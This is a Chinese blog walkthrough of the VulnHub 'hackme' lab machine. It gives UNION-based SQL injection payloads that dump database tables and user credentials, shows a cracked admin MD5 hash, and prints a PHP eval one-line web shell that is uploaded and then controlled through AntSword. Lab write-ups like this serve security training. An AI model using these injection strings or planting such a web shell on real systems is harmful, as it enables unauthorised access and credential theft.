靶机通关| hackme.ova通关攻略

1.靶机准备

https://download.vulnhub.com/hackme/hackme.ova

安装至虚拟机,查看虚拟网卡ip,虚拟机网络配置为NAT模式,打开虚拟机。

2.查询虚拟机的ip

目的为找到网站,使用御剑2014扫描。

御剑2014 (07.26修复版)发布 (nmap.cc)

3.查询该站点下目录

目的为找到该网站下的站点,使用御剑后台扫描工具遍历查询目录。

GitHub - foryujian/yjdirscan: 御剑目录扫描专业版,简单实用的命令行网站目录扫描工具,支持爬虫、fuzz、自定义字典、字典变量、UA修改、假404自动过滤、扫描控速等功能。icon-default.png?t=N7T8https://github.com/foryujian/yjdirscan

发现共有5个网址,通过一一访问,我们并没有发现注入点,但该站点有注册、登录功能,我们可以去注册、登录进去看是否有注入点。

注:有的电脑可能因为安装包或环境原因,登录进去后,必须先以空值search一下,才会显示出内容。

4.判断漏洞类型

我们注册后会发现,会在页面上显示用户名,可以尝试XSS注入,但是失败了。

该网站有登录,注册界面,我们可以尝试二次注入,但是由于没有修改账户的页面,也宣告失败。

最后经判断为sql注入类型。

5.sql注入流程

1)查看有没有sql注入

OSINT’ and 1=1 #

OSINT’ and 1=2 #

这里得输入book title值才能判断。

2)判断字段数

OSINT' order by 3 #

字段数为4。

3)查看数据库名

-1' union select 1,database(),3 #

这里开始就可以使用id值(不存在的值)了,我们为了方便就直接使用了。

4)查看数据库表名

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #

5)查看users表所有的列

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users' #

6)查看数据

-1' union select group_concat(user),group_concat(pasword),3 from users#

我们发现有个superadmin(超级管理员账户),我们直接使用该账号重新登录。

superadmin
2386acb2cf356944177746fc92523983(为MD5加密,使用在线平台可直接得出)
密码解密得:Uncrackable

6.以管理员账户登录

进去可以看到可以上传文件,尝试上传一句话木马。

shell.php:

<?php phpinfo();eval($_POST['cmd']);?>

发现直接成功。

7.使用蚁剑连接

通关成功。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值